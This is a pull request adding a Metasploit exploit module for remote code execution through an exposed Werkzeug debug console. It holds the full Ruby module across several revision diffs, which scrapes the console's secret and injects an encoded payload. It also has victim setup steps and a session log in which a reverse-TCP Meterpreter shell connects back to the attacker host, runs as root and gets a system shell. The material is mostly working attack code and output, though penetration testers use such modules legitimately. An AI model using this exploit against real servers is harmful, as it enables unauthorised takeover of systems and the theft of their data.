### PR TITLE
Werkzeug debug rce

### DIFF
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -19,7 +19,8 @@ class Metasploit4 < Msf::Exploit::Remote
         machines", but sometimes slips passed testing.
         Tested against:
             0.9.6 on Debian
-            0.10  on CentOS
+            0.9.6 on Centos
+            0.10  on Debian
       },
       'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
       'References'  =>
@@ -45,8 +46,8 @@ class Metasploit4 < Msf::Exploit::Remote
         'method'   => 'GET',
         'uri'      => normalize_uri(datastore['URI'])
     })
-    #https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/debug/tbtools.py#L67
-    if (res and res.body =~ /Brought to you by <strong class="arthur">DON'T PANIC<\/strong>, your\n        friendly Werkzeug powered traceback interpreter./)
+    #https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
+    if res and res.body =~ /Werkzeug powered traceback interpreter/
       return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
@@ -54,12 +55,12 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def exploit
     #first we need to get the SECRET code
-    secret = send_request_cgi({
+    res = send_request_cgi({
         'method'   => 'GET',
         'uri'      => normalize_uri(datastore['URI'])
     })
-    if (secret and secret.body =~ /SECRET = "([a-zA-Z0-9]{20})";/)
-      secret = secret.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
+    if res and res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
+      secret = res.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
       vprint_status("Secret Code: #{secret}")
       res = send_request_cgi({
           'method'   => 'GET',

--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -29,52 +29,51 @@ class Metasploit4 < Msf::Exploit::Remote
           ],
       'License'     => MSF_LICENSE,
       'Platform'       => ['python'],
-      'Targets'        => [[ 'werkzeug 0.10 and older', { }]],
+      'Targets'        => [[ 'werkzeug 0.10 and older', {}]],
       'Arch'           => ARCH_PYTHON,
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jun 28 2015',
     )
     register_options(
       [
-        OptString.new('TARGETURI',[true,'URI to the console','/console'])
+        OptString.new('TARGETURI', [true, 'URI to the console', '/console'])
       ], self.class
     )
   end
 
   def check
-    res = send_request_cgi({
-        'method'   => 'GET',
-        'uri'      => normalize_uri(datastore['TARGETURI'])
-    })
-    #https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
-    if res and res.body =~ /Werkzeug powered traceback interpreter/
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(datastore['TARGETURI'])
+    )
+    # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
+    if res && res.body =~ /Werkzeug powered traceback interpreter/
       return Exploit::CheckCode::Appears
     end
-    return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
   def exploit
-    #first we need to get the SECRET code
-    res = send_request_cgi({
-        'method'   => 'GET',
-        'uri'      => normalize_uri(datastore['TARGETURI'])
-    })
+    # first we need to get the SECRET code
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(datastore['TARGETURI'])
+    )
     if res && res.body && res.body.to_s =~ /SECRET = "([a-zA-Z0-9]{20})";/
       secret = $1
-      vprint_status("Secret Code: #{secret}")
-      res = send_request_cgi({
-          'method'   => 'GET',
-          'uri'      => normalize_uri(datastore['TARGETURI']),
-          'vars_get' => {
-              '__debugger__' => 'yes',
-              'cmd' => payload.encoded,
-              'frm' => '0',
-              's' => secret
-          }
-      })
+      vprint_status('Secret Code: #{secret}')
+      send_request_cgi(
+        'method'   => 'GET',
+        'uri'      => normalize_uri(datastore['TARGETURI']),
+        'vars_get' => {
+          '__debugger__' => 'yes',
+          'cmd' => payload.encoded,
+          'frm' => '0',
+          's' => secret
+        }
+      )
     else
-      print_error("Secret code not detected.")
+      print_error('Secret code not detected.')
     end
   end
 end
-

--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -36,7 +36,7 @@ class Metasploit4 < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('URI',[true,'URI to the console','/console'])
+        OptString.new('TARGETURI',[true,'URI to the console','/console'])
       ], self.class
     )
   end
@@ -44,7 +44,7 @@ class Metasploit4 < Msf::Exploit::Remote
   def check
     res = send_request_cgi({
         'method'   => 'GET',
-        'uri'      => normalize_uri(datastore['URI'])
+        'uri'      => normalize_uri(datastore['TARGETURI'])
     })
     #https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
     if res and res.body =~ /Werkzeug powered traceback interpreter/
@@ -57,14 +57,14 @@ class Metasploit4 < Msf::Exploit::Remote
     #first we need to get the SECRET code
     res = send_request_cgi({
         'method'   => 'GET',
-        'uri'      => normalize_uri(datastore['URI'])
+        'uri'      => normalize_uri(datastore['TARGETURI'])
     })
     if res and res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
       secret = res.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
       vprint_status("Secret Code: #{secret}")
       res = send_request_cgi({
           'method'   => 'GET',
-          'uri'      => normalize_uri(datastore['URI']),
+          'uri'      => normalize_uri(datastore['TARGETURI']),
           'vars_get' => {
               '__debugger__' => 'yes',
               'cmd' => payload.encoded,

--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -61,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote
     )
     if res && res.body && res.body.to_s =~ /SECRET = "([a-zA-Z0-9]{20})";/
       secret = $1
-      vprint_status('Secret Code: #{secret}')
+      vprint_status("Secret Code: #{secret}")
       send_request_cgi(
         'method'   => 'GET',
         'uri'      => normalize_uri(datastore['TARGETURI']),

--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -25,7 +25,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
       'References'  =>
           [
-            [ 'Website', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
+            [ 'URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
           ],
       'License'     => MSF_LICENSE,
       'Platform'       => ['python'],
@@ -48,7 +48,7 @@ class Metasploit4 < Msf::Exploit::Remote
     })
     #https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
     if res and res.body =~ /Werkzeug powered traceback interpreter/
-      return Exploit::CheckCode::Vulnerable
+      return Exploit::CheckCode::Appears
     end
     return Exploit::CheckCode::Safe
   end
@@ -59,8 +59,8 @@ class Metasploit4 < Msf::Exploit::Remote
         'method'   => 'GET',
         'uri'      => normalize_uri(datastore['TARGETURI'])
     })
-    if res and res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
-      secret = res.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
+    if res && res.body && res.body.to_s =~ /SECRET = "([a-zA-Z0-9]{20})";/
+      secret = $1
       vprint_status("Secret Code: #{secret}")
       res = send_request_cgi({
           'method'   => 'GET',

--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+      'Name'        => 'Werkzeug Debug Shell Command Execution',
+      'Description' => %q{
+        This module will exploit the Werkzeug debug console to put down a
+        python shell.  This debugger "must never be used on production
+        machines", but sometimes slips passed testing.
+        Tested against:
+            0.9.6 on Debian
+            0.10  on CentOS
+      },
+      'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
+      'References'  =>
+          [
+            [ 'Website', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
+          ],
+      'License'     => MSF_LICENSE,
+      'Platform'       => ['python'],
+      'Targets'        => [[ 'werkzeug 0.10 and older', { }]],
+      'Arch'           => ARCH_PYTHON,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 28 2015',
+    )
+    register_options(
+      [
+        OptString.new('URI',[true,'URI to the console','/console'])
+      ], self.class
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(datastore['URI'])
+    })
+    #https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/debug/tbtools.py#L67
+    if (res and res.body =~ /Brought to you by <strong class="arthur">DON'T PANIC<\/strong>, your\n        friendly Werkzeug powered traceback interpreter./)
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    #first we need to get the SECRET code
+    secret = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(datastore['URI'])
+    })
+    if (secret and secret.body =~ /SECRET = "([a-zA-Z0-9]{20})";/)
+      secret = secret.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
+      vprint_status("Secret Code: #{secret}")
+      res = send_request_cgi({
+          'method'   => 'GET',
+          'uri'      => normalize_uri(datastore['URI']),
+          'vars_get' => {
+              '__debugger__' => 'yes',
+              'cmd' => payload.encoded,
+              'frm' => '0',
+              's' => secret
+          }
+      })
+    else
+      print_error("Secret code not detected.")
+    end
+  end
+end
+


### PR DESCRIPTION
Exploits the [Werkzeug](http://werkzeug.pocoo.org/) debug console for version 0.9.6 (Debian repo) through 0.10 (current/git).  Console is essentially a python interpreter, so exploitation is easy.  Documentation for Werkzeug, which many python web apps are built on, specifically says the debugger "must never be used on production machines".  I have created a werkzeug app with the debug console exposed in my metasploit repo, to aid in testing.
# Victim Setup (Debian)

```
apt-get install python-werkzeug
git clone https://github.com/h00die/metasploit.git
cd metasploit/
python werkzeug_console.py
```
# Exploitation

```
msf > use exploit/multi/http/werkzeug_debug_rce
msf exploit(werkzeug_debug_rce) > set rport 8081
rport => 8081
msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
rhost => 10.108.106.201
msf exploit(werkzeug_debug_rce) > check
[+] 10.108.106.201:8081 - The target is vulnerable.
msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
lhost => 10.108.106.121
msf exploit(werkzeug_debug_rce) > exploit

[*] Started reverse handler on 10.108.106.121:4444
[*] Sending stage (25277 bytes) to 10.108.106.201
[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400

meterpreter > getpid
Current pid: 13034
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : werkzeug
OS           : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
Architecture : x86_64
Meterpreter  : python/python
meterpreter > shell
Process 13037 created.
Channel 0 created.
/bin/sh: 0: can't access tty; job control turned off
# ls
app.py  app.pyc  werkzeug
# exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.108.106.201 - Meterpreter session 2 closed.  Reason: User exit
```
